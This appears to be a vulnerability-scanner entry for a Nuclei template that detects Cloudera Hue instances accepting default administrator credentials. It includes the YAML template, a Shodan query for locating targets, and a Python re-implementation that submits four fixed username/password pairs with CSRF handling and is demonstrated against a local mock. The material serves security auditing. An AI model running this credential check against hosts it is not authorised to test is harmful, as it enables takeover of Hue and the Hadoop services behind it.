hue-default-credential: Cloudera Hue Default Admin Login

Date: 2025-09-01 | Affected software: Cloudera Hue | PoC: public

Vulnerability description

Cloudera Hue instances were found accepting default or trivially guessable administrator credentials. The template below submits four fixed username/password pairs (admin/admin, hue/hue, hadoop/hadoop, cloudera/cloudera) to the Django login form at /hue/accounts/login and reports a hit only when the server answers with a 302 redirect that sets both a sessionid and a csrftoken cookie; a rejected login re-renders the form with status 200 and sets no session. Note that Hue's default authentication backend makes the first user to log in the superuser, so an instance whose first account was created with one of these passwords hands over full administrative access to the Hue UI and the Hadoop services it fronts. Shodan query: title:"Hue - Welcome to Hue"

PoC code [public]

id: hue-default-credential

info:
  name: Cloudera Hue Default Admin Login
  author: For3stCo1d
  severity: high
  description: Cloudera Hue default admin credentials were discovered.
  reference:
    - https://github.com/cloudera/hue
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
    cpe: cpe:2.3:a:cloudera:hue:*:*:*:*:*:*:*:*
  metadata:
    max-request: 8
    shodan-query: title:"Hue - Welcome to Hue"
    product: hue
    vendor: cloudera
  tags: hue,default-login,oss,cloudera,vuln

http:
  - raw:
      - |
        GET /hue/accounts/login?next=/ HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /hue/accounts/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        csrfmiddlewaretoken={{csrfmiddlewaretoken}}&username={{user}}&password={{pass}}&next=%2F

    attack: pitchfork
    payloads:
      user:
        - admin
        - hue
        - hadoop
        - cloudera
      pass:
        - admin
        - hue
        - hadoop
        - cloudera

    extractors:
      - type: regex
        name: csrfmiddlewaretoken
        part: body
        internal: true
        group: 1
        regex:
          - name='csrfmiddlewaretoken' value='(.+?)'
    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - contains(tolower(body_1), 'welcome to hue')
          - contains(tolower(header_2), 'csrftoken=')
          - contains(tolower(header_2), 'sessionid=')
        condition: and

      - type: status
        status:
          - 302
# digest: 490a004630440220259450e8943d7245697fb59b7a800e9e42451a5da9f6e0609bb1d84200733f9b02202e87b43d12cc3fdcdb6b082124bf9f71f84a9263b8cfb1f8b949fb0738678004:922c64590222798bb761d5b6d8e72950
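What the template does on the wire, as an added Python example that is not Hue's or the Nuclei project's code: it re-implements the two raw requests, the csrfmiddlewaretoken extractor, the pitchfork pairing and the three matchers, and runs them against a constructed mock of Hue's Django login view. MockHue, the accepted pair hadoop/hadoop, the loopback port and the simplified token handling are assumptions made so the check runs offline. The mock enforces Django's double-submit CSRF rule, which is the step a hand-rolled checker most often gets wrong: the csrftoken cookie from the first response must be sent back with the POST, otherwise the server returns 403 before it ever looks at the credentials.

```python
"""Added example, not Hue or Nuclei code: the template's GET-token, POST-pair,
check-cookies flow run against a constructed mock of Hue's Django login view."""
import http.cookiejar
import http.cookies
import re
import secrets
import threading
import urllib.error
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# attack: pitchfork pairs the two lists by position (admin/admin, hue/hue, ...):
# 4 pairs x 2 requests = max-request 8. clusterbomb would try all 16 combinations.
USERS = ["admin", "hue", "hadoop", "cloudera"]
PASSES = ["admin", "hue", "hadoop", "cloudera"]
PAIRS = list(zip(USERS, PASSES))
CSRF_RE = re.compile(r"name='csrfmiddlewaretoken' value='(.+?)'")  # template's extractor


class MockHue(BaseHTTPRequestHandler):
    """Stand-in for Hue's login view (assumption). Accepts only the hypothetical
    weak pair hadoop/hadoop, so the scan must get past two rejections first."""
    VALID = ("hadoop", "hadoop")
    issued = set()

    def log_message(self, *args):
        pass

    def _reply(self, code, *headers):
        self.send_response(code)
        for name, value in headers:
            self.send_header(name, value)
        self.end_headers()

    def do_GET(self):
        tok = secrets.token_hex(16)
        MockHue.issued.add(tok)
        body = ("<title>Hue - Welcome to Hue</title><form method='post'>"
                f"<input type='hidden' name='csrfmiddlewaretoken' value='{tok}' /></form>").encode()
        self._reply(200, ("Set-Cookie", f"csrftoken={tok}; Path=/"), ("Content-Length", str(len(body))))
        self.wfile.write(body)

    def do_POST(self):
        form = urllib.parse.parse_qs(self.rfile.read(int(self.headers.get("Content-Length", 0))).decode())
        jar = http.cookies.SimpleCookie(self.headers.get("Cookie", ""))
        form_tok = form.get("csrfmiddlewaretoken", [""])[0]
        cookie_tok = jar["csrftoken"].value if "csrftoken" in jar else ""
        # Django's CSRF check: form token must match the csrftoken cookie, or the
        # client gets 403 and the credentials are never evaluated.
        if form_tok not in MockHue.issued or form_tok != cookie_tok:
            return self._reply(403)
        if (form.get("username", [""])[0], form.get("password", [""])[0]) != self.VALID:
            return self._reply(200)  # form re-rendered, no session cookie
        self._reply(302, ("Location", "/"),
                    ("Set-Cookie", f"sessionid={secrets.token_hex(16)}; Path=/; HttpOnly"),
                    ("Set-Cookie", f"csrftoken={secrets.token_hex(16)}; Path=/"))  # rotated on login


class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Surface a 302 as HTTPError instead of following it, so the status can be checked."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def try_login(base, user, password):
    """One pitchfork iteration: GET the form, POST the pair, apply the template's matchers."""
    opener = urllib.request.build_opener(
        urllib.request.HTTPCookieProcessor(http.cookiejar.CookieJar()), NoRedirect())
    with opener.open(base + "/hue/accounts/login?next=/") as r:
        page = r.read().decode()
    m = CSRF_RE.search(page)
    if "welcome to hue" not in page.lower() or not m:  # body_1 matcher
        return False
    data = urllib.parse.urlencode({"csrfmiddlewaretoken": m.group(1), "username": user,
                                   "password": password, "next": "/"}).encode()
    req = urllib.request.Request(base + "/hue/accounts/login", data=data,
                                 headers={"Content-Type": "application/x-www-form-urlencoded"})
    try:
        with opener.open(req):  # 2xx means the form came back: pair rejected
            return False
    except urllib.error.HTTPError as e:
        cookies = " ".join(e.headers.get_all("Set-Cookie") or []).lower()
        # header_2 and status matchers: redirect plus fresh sessionid and csrftoken cookies
        return e.code == 302 and "sessionid=" in cookies and "csrftoken=" in cookies


def find_weak_login(base):
    """Walk the pairs in order; stop at the first hit (stop-at-first-match)."""
    for user, password in PAIRS:
        if try_login(base, user, password):
            return (user, password)
    return None


def demo():
    """Serve the mock on an ephemeral loopback port, scan it, return the matched pair."""
    server = HTTPServer(("127.0.0.1", 0), MockHue)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        return find_weak_login(f"http://127.0.0.1:{server.server_address[1]}")
    finally:
        server.shutdown()
        server.server_close()
```

demo() returns ('hadoop', 'hadoop') after the first two pairs are rejected with 200. Against a real host, call find_weak_login with the target's base URL and keep the combined 302-plus-sessionid test rather than matching on the redirect alone: a Django login view that rejects the pair re-renders the form with 200, and a 403 from the CSRF middleware means the cookie was not carried between the two requests, not that the credentials were wrong.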
